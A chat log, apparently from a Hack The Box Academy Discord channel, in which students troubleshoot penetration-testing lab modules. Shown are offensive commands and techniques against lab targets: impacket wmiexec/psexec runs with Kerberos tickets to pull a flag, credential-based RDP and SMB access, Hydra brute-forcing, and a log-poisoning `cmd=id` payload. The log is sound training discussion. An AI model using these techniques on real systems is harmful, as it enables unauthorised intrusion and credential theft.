Ok I just found the answer but it clearly was not the good way to do it lmao if someone can dm me it would be nice

Set up smbserver with creds.

^

or transfer via other methods

for instance: xfreerdp has the /drive: option

but how can i insert the creds when moving file?
for example, move file \smb\

because they dont prompt for username and password

it should ask for it during the operation if creds are needed

nope

net use \\networklocation\sharefolder password /USER:username

Then move the file

ur my savior thanks

hey i was wondering, i was doing the "NETWORK ENUMERATION WITH NMAP "

and i reached this question :
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.

i got the flag and am sure its the flag, but it keeps telling me its wrong

is there anything off ?

oh sorry lol i got it

the one typing, if you are typing for me, thanks a lot

Hi, so I'm currently doing the "Windows Server" section of the "Windows Privilege Escalation" Path. I tried RDPing into the machine but for the life of me I can't do it. I scanned the box and RDP is open, I tried using evil-winrm because winrm is open but I can't use the creds provided. SO I thought maybe I should exploit the box even though creds have been provided, It looks like the box is susceptible to Eternalblue but I can't exploit for the life of me, tried logging in the smb shares(got nothing), tried accessing rpc and got nothing, could'n't browse anything. I've been on this module for 5-6 hours lol. I think I'm supposed to RDP into the machine because this section provided creds but then again, I tried about 5 rdp clients(xfreerdp, remmina etc) and I can't connect on all of them but when scanning with nmap the port is open lol. Oh and I have restarted the machine like 5 times, so I'm absolutely lost

What happens when you try to xfreerdp into the machine

I get a tls error transport_connect_tls:freerdp_set_last_error_ex

Tried searching for a solution but apparently it's a kali problem, so I downloaded the VPN to my ubuntu machine and try to log into RDP but still get the same error. Going back to a previous section, and I can RDP no problem

can you show the command you're using please

have you tried from the pwnbox

xfreerdp /v:10.129.39.13 /p:HTB_@cademy_stdnt! /u:htb-student

I'm dumb I haven't tried it, it's soo laggy though but thanks soo much for the suggestion

yeah just to rule out your computer you know

also was rdesktop in your 5 clients you tried

It's just worked with the pwnbox It's super weird to me though. I've been rdping throught the CPTS course without any hassle but with this specific module. I had soo much trouble. Thanks again for the help man

yeah np. just do it from there on this one haha

it's instantly dies and I can't connect anymore. I dont know, I think I'll try again tomorrow

maybe the victim box despawned lol

You can try adding this to the end /tls-seclevel:0

https://academy.hackthebox.com/module/147/section/1319 we agree you need to crack the root password or find it on the system ?

Thanks for the suggestion but I think it's the box at this point.

Module ADCS attacks, section ESC10. Why doesn't psexec print flag but wmiexec does?

└─$ KRB5CCNAME=Administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Windows\System32\rbcd.txt
{FLAG}
C:\>exit
                                                                                                                                
┌──(kali㉿kali)-[/tmp]
└─$ KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass LAB-DC.LAB.LOCAL 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on LAB-DC.LAB.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file pepPLMKe.exe
[*] Opening SVCManager on LAB-DC.LAB.LOCAL.....
[*] Creating service rwYV on LAB-DC.LAB.LOCAL.....
[*] Starting service rwYV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3772]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> type C:\Windows\System32\rbcd.txt
The system cannot find the file specified.

you sure that's the right path?

also check the access permissions

Yes, because I get the flag using different method and the question directly says the flag

Im just wondering why doesnt psexec give that

windows wouldn't tell you "The system cannot find the file specified." if the file is there

system32 is a weird place for the flag

it's the problem is not with the shell

also what section and question

But the file exists in that location

clearly it doesn't

ESC10, only question

Abuse ESC10 and Resource-Based Constrained Delegation to compromise the DC and submit the content of the flag C:\Windows\System32\rbcd.txt

C:>type C:\Windows\System32\rbcd.txt
{FLAG}

I just removed the flag value for obv reasons

k but a shell is a shell. and your command literally says "cannot find the file", so you're in the wrong location

Its a full path and other shell finds it and other doesnt

is there any redirections?

ur probably either have no file access permissions or its redirection issue

also isn't it flag.txt not rbcd.txt?

@cloud urchin Abuse ESC10 and Resource-Based Constrained Delegation to compromise the DC and submit the content of the flag C:\Windows\System32\rbcd.txt
This is the question 😄

alright

Would be nice if someone else can confirm this behavior

smbexec manages to print flag too

no idea

hi guys! I have a problem...in module Using Web Proxies->Proxyng Tools i set the .conf file for proxychains, but once i try to run it with curl owasp zap don't capture anything, also with Metasploit.

I also added in owasp zap a HTTP proxy and modified the proxychains.conf but still don't work

anyone ?

I would go back over that part of the module. https://dev.to/adamkatora/how-to-use-burp-suite-through-a-socks5-proxy-with-proxychains-and-chisel-507e

do you know if is also possible with owasp zap?

not sure, but i'd wager zap probably can do it

If you follow the section from start to finish you will have your answer

i find the files but it takes 2 hours to crack and at the end there's nothing :/

did you use the mutated list?

password.list ?

no i use rock you

Use the mutated password list constructed from the mutated passwords section

ok thx

in file inclusion skill assessment , i found the admin panel and im trying to log poisin but the php payload won't work, i intercepted the request by burpsuite but its always blank, and when i assign ?cmd=id , the log breaks

can i mp someone to show him the manipe i made and the hash found?

Just put the whole line with root in its own file and try and crack it

guys, im a bit stuck in Footprinting - SMTP module, ive tried || smtp_user_enum command with more response timeout with some wordlists, metasaploit smtp_enum scanner, and nmap smtp_enum_users.nse || it gives a lot of users but none is correct, any info or advice?

finally done with the malware analysis module. Thank goodness

Alright I give up, any tips on getting the .203 IP on Foothold DNS module? I've tried n0kovo, sortedcombined-dns-recon-fierce, bitqquark, top 11000. Kinda tired of waiting a million years for nothing.

that's a funny looking user agent you've got going on there, why do you trim the bees and simplify your system to just basic commands

Pivoting, Tunneling, and Port Forwarding
Skills Assessment

Q.3 Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

I know this is silly one but I cannot able to do ping sweep and cannot even able to get shell on my kali from web shell. I know I am missing something silly but not getting it.

got creds of mle*** and i am sensing to use it as xfreerdp (due to practice with all other section in module) but not sure how to do proxychains here

That module comes with a wordlist. And smtp_user_enum is the right way forward

The section has a wordlist you can use

The nse script is stupid imo, and requires you to research how to pass script args

no way HASHDAHSD

;/

it's good lol it's the problem ahah

enumerate more

yea I get it but where? checked all inside port, NICs

If you have what you say you have then what you also want is right there too, and if you go back to the basics you'll know what to use it with

Hello. I am working on the module "Password attacks" and specifically doing the question related to the section "Password Mutations". I have created a password list and hydra is telling me that it will take 2 hours, which not so long (but not so short too). I am just wondering, when you are working on a box, do you generally try to do a bruteforce attack on the different services you enumerate? Or do you do it only when you are out of solutions?

Okay cool I’m working on this and restarting from basic

Don't attack ssh

Lmao i just wanted to leave a mark in the logs so i can read easily where the commands should be executed

I tried doing just the php payload but didn’t work, or rather the log crashes

But you usually attempt brute force attack on any other services when you work on a box, don't you?

There's other services running, enumerate

Ssh is painfully slow

unless you use ssb

then either you succeed or it dies

https://tenor.com/view/drago-rocky-if-he-if-he-dies-he-dies-gif-10570702

Referring to available and mentioned tools ig

Im doing "Windows Privilege Escalation Skills Assessment - Part I" and Im trying to get juicypotato to run, im checking different clsids but im not sure if I gotta keep checking different ones or if my command is wrong

you could go caramelize onions before brute forcing ssh finishes

At least with hydra

Ssb tool goes brrr

i thought this tool's ascii art looked like a 🖕 for a second

It very well could

omg i was using ?cmd=id instead of &cmd=id

i lost 3hours due to this lmao

Zodiac case vs the watcher case

Hey, iam doing "attacking on sql databases" and finally got the mssqlsvc hash and password. when iam trying to login it says "mssql: login error: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication." any hints?

Did you try a simpler PHP payload?

SQLMap Essentials module. question "What's the contents of table flag5? (Case #5)" I get 2 different flags to appear somehow, but says they are both wrong

can someone give me a nudge for ad enumeratinon & attack skills assessment part 2 q1?

[*] Exploit completed, but no session was created.

why do i keep getting this error
i've copied and paste the exact same info apart from replacing the rhost and lhost (tun0)

mine is failling at the hightlighted

Start at the beginning, every technique is used

is theres someone that knows what is this happening when i try to use mssqlclient.py? "[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]
"

It looks like it's using ssl? Idk

yes, but, what does this mean? [('SSL routines', '', 'no protocols available')], i cannot login to the database

It means it, for whatever reason, isn't detecting ssl maybe? Adding -v will be more verbose

for impacket it's -debug

Thx

is your impacket version outdated? I've never seen problems with mssqlclient.py ssl, it should just switch without problems, try to update/reinstall it with pipx

its so weird!

hello guys i have question

module - Password Attack
Section - Credential hunting in windows

i use the lazagne but not running windows11 did you know other method same lazagne
https://academy.hackthebox.com/module/147/section/1318

or lazagne runing which windows

it works in win11

i try in my computer but not runing

Magic byte is not required on there.

I also don't think any targets run windows 11

yeah ik, they're saying they tired and it doesn't run in win11

but it does

don't try to run tools in your own host pls, use a vm if you want to test, and wdym not running? what's the error

however, you will use the magic byte later on when after you successfully got the source code of upload.php

check with software publish vs vs

?

can i send error png on dm

read #welcome to get verified and you can send screenshots

But we also encounter these machines in the customer environment, so I tried it

Well we can't help you on a rl engagement

definitely works in my own lab

?

my error- > this app cant run on your pc

to find a version for your pc, check with the software publisher

Hello. @short gulch @red spruce @9twek
Hope you found answer for "how "advanced_ip_scanner.exe" was introduced to the compromised system"
Hint for others use examples from previous topic, find exploring USN. Go through findings, discord search :), note SIEM crucial thing 🙂 T__e
Then you need use USN example in current topic. I think it will be enough to find answer.

Are you trying to run via gui?

nope i try in cmd

download the latest version

yes tihs latest version

2.4.5

https://github.com/AlessandroZ/LaZagne/releases/

Either way: this strays from academy talk

And goes more into personal issues.

That's right, I just wanted to know if there is a problem with the tool.

Sounds like an issue with your environment

Still not relevant though

true i will search

As the tool is just referenced/lightly shown in a module

I've been struggling with the lab assignment for over a day now. The task description mentions that Johanna's account is accessible on numerous hosts, though the specifics of these hosts seem to change with each reset. It appears that using her password to access other hosts might not be the right approach. I've managed to discover Johanna's password and used RDP to connect to the specified host. However, I'm having trouble opening the contents of a file named|| L*.k||. I've attempted to decrypt it using various password lists, including a mutated one and rockyou, but haven't had any success. Could someone please suggest which wordlist I should try next?

you already used the word list you are suppose to, maybe there is another tool 2 crack it?

Fking module. I have serious grudge with this module now

It gets better

[*] Exploit completed, but no session was created.

why do i keep getting this error
i've copied and paste the exact same info apart from replacing the rhost and lhost (tun0)

mine is failling at the hightlighted

Just tried it and it does work, double check carefully that you are setting the 5 items correctly, if that still looks correct maybe try chaning vpn from udp to tcp. I know the winowds boxes sometimes take a bit longer to spin up even though you already have an ip, you give it some time?

I'm not putting the rest since it's a hash to find but I don't understand why I can't find the hash for it seems so easy to me.

https://academy.hackthebox.com/module/147/section/1323

you try reading this part of the section? Viewing the Cracked Hash

have you tried using the mutated wordlist?

yes but nothing

that's not the issue: the issue is that he hasn't cracked it

and the password should be in the mutated wordlist

are you using a fresh mutated list

that line at the end of john is it's version of "exhausted"

ahh the password.list yes but i didn't mutated

or are you using a cropped one as recommended from earlier sections

mutate it

this module reuses the mutated wordlist a LOT

general path to follow with this module: mutated list -> regular password list -> rockyou

I understand that this module forces us to see the notion of mutation.

not just the notion

it's literally having you reuse that mutated password list basically every time you have to crack/bruteforce

except maybe like one time

it's true

meaning don't stray from it unless forced to

oh my notes are wrong, i was showing rockyou for some reason

always start with provided resources unless the section shows you explicitly otherwise

if it's from the Notes.Zip from kira, then it's likely in a version of rockyou, maybe, but it's for sure in the mutated list

No its not in rockyou at all

the info are correct. I was already using tcp as vpn switched to udp and still nothing.
you said u tried it as well and it did not work?

I thought that since the zip came from the user kira, the password would necessarily be kira mutated.

it can be but it doesn't mean it will be

also all of kira's mutated passwords are in the grander mutated_password list

so it's still the same resource

you need to get into the habit of properly naming your files; hashes.zip would imply to me it's a zip file that contains hashes, not a password hash for a password protected zip

i see

no, it works for me

generally when I name my hashes i will do [username].hash(es) and output to a [username].cracked

https://tenor.com/view/spongebob-patrick-star-noted-notes-gif-26231953

that way when i refer back to it in my notes/system I know where it is/what i'm looking for

of course I thought just writing hash would be more meaningful

well yes; it's meaningful

damn this one made me think

same lol

sometimes the user you're looking for is hiding behind another user

if you haven't solved it yet

i found it in history

👍

but i didnt realize i needed to run 3.9 specifically

ah yeah i think the venv on the labs is running 2.7 by default

whatever is symlinked to the /usr/bin/python directory

yeahhhhhhh i was running 3 over and over. then tried laz

and finally was like why not

yeah sometimes being super specific helps

i think the change from 3.8 -> 3.9 changed a lot of things

and eventually there'll be another leap that breaks more

such is the way of languages

pwn box is behaving weird. when i press any arrow key (side, top, bottom) it start displaying character such as (,&%' . is it tripped iam on the service enumeration module.

Try disabling some extensions if you have any, it sounds like something is messing with it

hey! I still have problems with proxychains, i can't capture anything with owasp zap, but also seems that proxychains with curl (like in the Using Web Proxies->Proxying Tools module) does not work properly, i did all the things descibed, and i also looked for info on Google, maybe i lost a particualr setting in proxychains.conf?

by the way, owasp zap works fine with browsers and also with foxyproxy, i have problems only with proxychains, metasploit and nmap!

yeah browser is the problem, i was using dolphin anty browser. somehow its causing problem.

why not use Burp?

Do you think is a software problem of zap? i prefer zap, but i'll try burp

<@&861185840277487616> we do not do hacker for hire, read #rules

with burp it works!

Thanks

Reading back through your messages, you said you did HTTP Proxy, but if you want it to go through proxychain you'll want a socks proxy

yes, i tried with socks proxy and after a lots of fails i tried with http proxy, but with burp it works and i have the same settings used for ZAP, i don't understand why...

this is infuriating i dont know what else to do here

it authenticated but no session was created

are you able to try it on pwnbox?

same error on pwdboc

pwnbox*

have you tried typing out all the commands instead of copy paste?

i had to since pwnbox does not allow for copy and paste

ok i just did it again and it worked. Like what the hell! I put the exact same info. why is it working now! 😦

Thanks for the help brother!

it allows copy paste, click on the ssl lock or menu option just left to the url. and enable the clipboard permission.

really? i didn't know that. Sure will make things easier thanks.

So I’m on passwords module. I successfully got a few users and passwords and successfully connected to win10 machine found flag on desktop and am trying to paste it in the blank and it is not accepting the answer as being correct

Help pls

make sure there is no space before the flag

There is not

Or after

Anyone who has done this module and has this flag saved please message me so I can send you this and see if it’s the same. I do t understand how it can be worn it’s the only user that I can rdp with

Wrong not worn

you arent rdping

you are evil-winrming io believe

Xfreerdp

I used xfreerdp to connect

im 99% sure you need to winrm with the right user not the one that has rdp perms

Flag is on desktopyou are right crap that must be a different flag

On rev shells. Used the rev shell given by module as well as revshells.com - none of them are working, the powershell just throws me about a page full of errors... I've tried different ports as well as admin powershell, and disabled AV any ideas?

yea there is a user for eachquestion

Ya I got em mixed around sorry

Each user for this section has a unique service

While their creds may work for other services once you hit one they should be crossed off

Also: I suggest checking C:\users to narrow your user list down

Since you already cracked one

I have all 4

Thanks guys I am tired worked all day but persistent just need sleep

Got two flags since you helped me

Also, this is just a super general suggestion to look for local users once in it narrows your user list substantially

For AD users there's other methods

But local- super helpful

I am in the module "modern web exploitation techniques", I was able to get the flag with the second order IDOR (whitebox), now I am writing a python script to automate the process, can someone who is in the same module and can help me with the script?

After a little bit of trouble shooting - worth noting that the rev shell htb gives you for that module will not work, they have it set up wrong

Stuck in the Intro to Digital Forensics module
"Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.exe"

I'm pretty sure I've identified || temp.bat || as the file that downloads advanced_ip_scanner.exe onto the system, so I'm trying to open the mft_data file into mft explorer to try and see whats inside the file and it just hangs and won't open. Am I at least on the right track?

check the USN journal again

Hi

Does anyone know the website of the company EF from htb ctf?

I think I'm just dumb and overlooking it, any hint?

uh so I opened the usn csv directly instead of filtering in ps like the module shows and I see a lot more but still don't think I'm on the right path
I see || trustedinstaller.exe ||, ||wmiprvse.exe || and || tiworker.exe || all downloading files right before an advanced.zip appears, but none of those worked

do you have it open in Timeline Explorer?

good evening, i'm new to the group and new to cybersecurity! can you give me a few suggestions to help me get started please!

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

yea

now search for what you're looking for

Ctrl+F

i might be stupid

I mean.. yes I've searched the advanced_ip..

you see the zip file

ya

there's something you can leverage to figure out how it got there

specifically event logs

good

@dim wolf thanks

im stuck in the type filters section in file uploads module, i bypassed all filters, i successed in uploading files but i get this error, i tried multipe php allowed extensions but none worked

got it thank you 🙂

for Password Attacks Lab - Hard, i cant get the file in SMB, ive tried impacket, smbmap, smbclient on pwnbox and my own kali

i tried doing it on the target windows machine but keep state no file found

Hello

hello

question : What is the type of the service of the "syslog.service"?

https://academy.hackthebox.com/module/18/section/2093

my input : systemctl list-units --type=service | grep syslog.service

already reset more than 10 timexz

looks like a connection issue, impacket's smbclient also times out?

yes

by looking through the chat i realised a lot ppl have this issue too

I need help with Password Attacks, Protected Files

This question
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

I have no idea what "cracked password" they are talking about

for Kira

you've cracked their password in the previous section, use that

everyone elses target machines spawning in a timely fashion? cuz mine has been spawning for quite some time even after refreshing